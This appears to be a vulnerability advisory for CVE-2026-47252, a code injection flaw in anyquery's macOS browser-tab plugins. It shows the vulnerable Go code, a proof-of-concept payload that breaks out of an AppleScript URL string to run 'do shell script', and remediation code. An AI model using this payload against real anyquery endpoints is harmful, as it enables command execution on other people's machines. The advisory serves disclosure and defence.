
anyquery CVE-2026-47252

Severity: CRITICAL 9.0 (CVSS 3.1)
Weakness: Code Injection (CWE-94)
Published: 2026-06-08
Repository: https://github.com/julien040/anyquery
Advisory: GHSA-hrj8-hjv8-mgwc

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Source Code Evidence Fetched: Jun 08, 2026 - 23:33 (vuln.today)
Analysis Generated: Jun 08, 2026 - 23:33 (vuln.today)
CVE Published: Jun 08, 2026 - 23:04 (nvd)

Description (NVD)

AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin

Repository: julien040/anyquery
Affected version: 0.4.4 (commit 0abd460)
Vulnerability: CWE-94 - Improper Control of Generation of Code
Severity: High

Summary

The chrome_tabs plugin (and equivalent Brave/Edge/Safari variants) interpolates a SQL-controlled url value directly into an AppleScript template via fmt.Sprintf(newTabScript, url) at plugins/chrome/tabs.go:141 without any escaping, then passes the result to exec.Command("osascript", "-e", ...). An authenticated anyquery user who can issue SQL INSERT INTO chrome_tabs statements - which requires local CLI access - can break out of the {URL:"..."} property record with a newline-containing payload and inject arbitrary AppleScript statements, including do shell script, achieving OS-level command execution on the macOS host. The same pattern applies to the Update path at tabs.go:169 via the JXA setURL.js script.

Affected Code

plugins/chrome/tabs.go:141 - SQL-supplied url interpolated unescaped into AppleScript template, then executed via osascript -e

```go
// Insert handles `INSERT INTO chrome_tabs (...)`. row[2] is the SQL-supplied
// url column; it is formatted straight into the AppleScript template and the
// result is handed to `osascript -e` (the injection sink at tabs.go:141).
func (t *tabsTable) Insert(rows [][]interface{}) error {
	for _, row := range rows {
		url := "chrome://newtab/"
		if rawURL, ok := row[2].(string); ok {
			url = rawURL // no escaping or validation of the SQL value
		}

		cmd := exec.Command("osascript", "-e", fmt.Sprintf(newTabScript, url))
		output, err := cmd.CombinedOutput()
		if err != nil {
			// %w (not %W, which fmt does not recognise) is the error-wrapping verb.
			return fmt.Errorf("can't run osascript: %w (message: %s)\n Script: %s", err, output, fmt.Sprintf(newTabScript, url))
		}

	}

	return nil
}
```

plugins/chrome/tabs.go:169 - Update path interpolates url into JXA setURL.js template with identical lack of escaping

```go
		// Update path: the same unescaped url reaches the JXA template
		// setURLScript, run with `osascript -l JavaScript -e` (sink at tabs.go:169).
		if url != "" {
			cmd := exec.Command("osascript", "-l", "JavaScript", "-e", fmt.Sprintf(setURLScript, pk, url))
			output, err := cmd.CombinedOutput()
			if err != nil {
				// %w (not %W) is the error-wrapping verb.
				return fmt.Errorf("can't run osascript: %w (message: %s)\n Script: %s", err, output, fmt.Sprintf(setURLScript, pk, url))
			}
		}
```

Data flow: SQL INSERT url column (row[2]) → tabsTable.Insert → fmt.Sprintf(newTabScript, url) → exec.Command("osascript", "-e", <injected script>) at tabs.go:141.

Proof of Concept

Step 1 - Insert a newline-bearing URL via SQL: the generated AppleScript closes the {URL:"..."} property record and appends an injected do shell script "id" block, which is passed verbatim to osascript -e.

```bash
docker build -f Dockerfile -t anyquery-vuln001 .
docker run --rm anyquery-vuln001 'x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done'
```

```text
SQL equivalent: INSERT INTO chrome_tabs (url) VALUES ('<INJECT_URL>')
where INJECT_URL =
x"}
end tell
do shell script "id"
tell application "Google Chrome"
	make new tab with properties {URL:"done
```

```text
[sink:tabs.go:141] Script passed to osascript -e:
tell application "Google Chrome"
        make new tab with properties {URL:"x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done"} at end of tabs of first window
end tell
[mock-osascript] Received script:
tell application "Google Chrome"
        make new tab with properties {URL:"x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done"} at end of tabs of first window
end tell
```

RESULT: PASS - injection payload reached osascript -e verbatim; "do shell script \"id\"" present in generated script (tabs.go:141)

See attached files: Dockerfile, poc/inject_demo.go, poc/go.mod (vuln-001.zip)

Impact

Any local user authenticated to the anyquery CLI who can run SQL against the chrome_tabs virtual table can achieve arbitrary OS command execution on the macOS host with the privileges of the anyquery process. Because anyquery exposes its SQL interface over an HTTP server (accessible to any user who can reach the endpoint), this can be exploited by any client with INSERT or UPDATE access to the browser-tab plugins, without requiring Chrome credentials or macOS admin rights. The injected AppleScript runs under the user's macOS session, giving access to the file system, keychain prompts, and any application scriptable via Apple Events.

Remediation

Escape double-quote and newline characters in the url value before interpolation, or avoid string templating entirely. Specifically in plugins/chrome/tabs.go:

```go
// Replace fmt.Sprintf(newTabScript, url) with (requires the "strings" import):
safeURL := strings.ReplaceAll(url, `"`, `\"`)
safeURL = strings.ReplaceAll(safeURL, "\n", "")
safeURL = strings.ReplaceAll(safeURL, "\r", "")
cmd := exec.Command("osascript", "-e", fmt.Sprintf(newTabScript, safeURL))
```

A more robust fix is to pass the URL as an AppleScript variable declared via a -e prefix argument rather than string-interpolating it into the script body, or to use the osascript argv mechanism so the URL never appears inside the script source. Apply the same fix to fmt.Sprintf(setURLScript, pk, url) at tabs.go:169 for the Update path. Validate that the URL conforms to an allowed scheme (https://, http://, chrome://) before passing it to either handler.
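The following is an added example, not code from the anyquery project, that works through both remediation options above in Go: an escaping function for AppleScript string literals plus the scheme allowlist, and the alternative of passing the URL through `osascript`'s `argv` via an `on run argv` handler so the value never becomes part of the script source. The `newTabScript` template is reconstructed from the generated script shown in the proof of concept (the plugin's real constant is not on the page), and the function names are assumptions. One caveat the snippet above does not cover: backslashes must be escaped before double quotes, otherwise a value ending in `\` followed by `"` becomes `\\"`, which AppleScript reads as an escaped backslash and a real closing quote. The example neither runs `osascript` nor needs macOS; it only builds the argument list.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"os/exec"
	"strings"
)

// newTabScript is reconstructed from the generated script shown in the PoC
// output; the plugin's real constant in plugins/chrome/tabs.go is not on the page.
const newTabScript = `tell application "Google Chrome"
	make new tab with properties {URL:"%s"} at end of tabs of first window
end tell`

// allowedSchemes is the scheme allowlist proposed in the remediation section.
var allowedSchemes = map[string]bool{"http": true, "https": true, "chrome": true}

// escapeAppleScriptString makes s safe to embed inside an AppleScript
// double-quoted literal. Backslashes are handled first: if only quotes were
// escaped, an input ending in `\` followed by `"` would become `\\"`, which
// AppleScript reads as an escaped backslash and then a real closing quote.
func escapeAppleScriptString(s string) string {
	return strings.NewReplacer(
		`\`, `\\`,
		`"`, `\"`,
		"\n", `\n`,
		"\r", `\r`,
		"\t", `\t`,
	).Replace(s)
}

// validateTabURL rejects control characters and any scheme outside the allowlist.
func validateTabURL(raw string) error {
	if strings.ContainsAny(raw, "\x00\n\r") {
		return errors.New("url contains control characters")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("invalid url: %w", err)
	}
	if !allowedSchemes[strings.ToLower(u.Scheme)] {
		return fmt.Errorf("scheme %q is not allowed", u.Scheme)
	}
	return nil
}

// newTabScriptFor is the escaping-only fix: the template is still string
// formatted, but the value can no longer terminate the literal or add lines.
func newTabScriptFor(raw string) string {
	return fmt.Sprintf(newTabScript, escapeAppleScriptString(raw))
}

// newTabArgsEscaped validates the URL, then interpolates its escaped form.
// It returns the arguments that would follow "osascript" on the command line.
func newTabArgsEscaped(raw string) ([]string, error) {
	if err := validateTabURL(raw); err != nil {
		return nil, err
	}
	return []string{"-e", newTabScriptFor(raw)}, nil
}

// newTabArgsArgv is the argument-passing fix: the script reads the URL from
// argv through an `on run argv` handler, so the value never enters the script
// source and no escaping is involved at all.
func newTabArgsArgv(raw string) ([]string, error) {
	if err := validateTabURL(raw); err != nil {
		return nil, err
	}
	const script = `on run argv
	tell application "Google Chrome"
		make new tab with properties {URL:(item 1 of argv)} at end of tabs of first window
	end tell
end run`
	return []string{"-e", script, raw}, nil
}

func main() {
	// Constructed input: the newline-bearing payload from the PoC section.
	payload := "x\"}\nend tell\ndo shell script \"id\"\ntell application \"Google Chrome\"\n\tmake new tab with properties {URL:\"done"

	fmt.Println("escaped form keeps the payload inside the literal:")
	fmt.Println(newTabScriptFor(payload))

	if _, err := newTabArgsEscaped(payload); err != nil {
		fmt.Println("validation rejects the payload:", err)
	}

	args, err := newTabArgsArgv("https://example.com/?q=a\"b")
	if err != nil {
		panic(err)
	}
	cmd := exec.Command("osascript", args...) // not run here: osascript is macOS-only
	fmt.Printf("would run: %q\n", cmd.Args)
}
```

With the escaping fix, the PoC payload produces a script with the same three lines as the template, the injected `do shell script` text sitting harmlessly inside the `URL` literal; with the allowlist it is rejected before any script is built. The `argv` variant is the one to prefer for new code, since it removes the string-templating sink rather than guarding it; the JXA `setURL.js` path can be handled the same way, as JXA `run` handlers also receive `argv`.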

Analysis (AI)

Code injection in the anyquery chrome_tabs plugin (and Brave/Edge/Safari variants) on macOS allows an authenticated SQL client to break out of an AppleScript URL property record and execute arbitrary osascript commands, including do shell script for OS-level command execution. The flaw affects anyquery 0.4.4 (commit 0abd460) and stems from unescaped string interpolation at plugins/chrome/tabs.go:141 and :169. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Reach anyquery HTTP SQL endpoint
Delivery: Send INSERT INTO chrome_tabs with newline payload
Exploit: Break out of {URL:"..."} AppleScript record
Execution: osascript executes injected do shell script
Persist: Run arbitrary commands as macOS user
Impact: Access files, keychain, scriptable apps

Vulnerability Assessment (AI)

Exploitation: Requires the anyquery service running on macOS with one of the browser-tab plugins (chrome, brave, edge, or safari) loaded, and the attacker must have SQL INSERT or UPDATE access to the corresponding virtual table (e.g., `chrome_tabs`). …
Risk Assessment: The CVSS 3.1 score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) reflects network reachability of the anyquery SQL HTTP endpoint, low attacker privilege, and a scope change because the injected AppleScript escapes the anyquery process to invoke arbitrary `osascript` and shell commands under the user's macOS session. …
Exploit Scenario: An attacker with network reach to an exposed anyquery HTTP SQL endpoint on a developer's Mac issues `INSERT INTO chrome_tabs (url) VALUES (...)` with a payload that embeds a newline, closes the AppleScript `{URL:"..."}` record, and appends `do shell script "..."`. `osascript` executes the injected statement under the developer's macOS session, granting file-system, keychain-prompt, and Apple-Events-scriptable application access. …
Remediation: Upstream fix available (commit c651df0b8767, pseudo-version 0.0.0-20240826075852-c651df0b8767); a released patched version is not independently confirmed beyond the GHSA package metadata, so upgrade anyquery to a build that includes commit c651df0b8767 or later per GHSA-hrj8-hjv8-mgwc (https://github.com/julien040/anyquery/security/advisories/GHSA-hrj8-hjv8-mgwc). …

Recommended Action (AI)

Within 24 hours: Inventory all macOS systems running anyquery 0.4.4 and identify SQL client user accounts with access to this plugin. …


CVE-2026-47252 vulnerability details – vuln.today
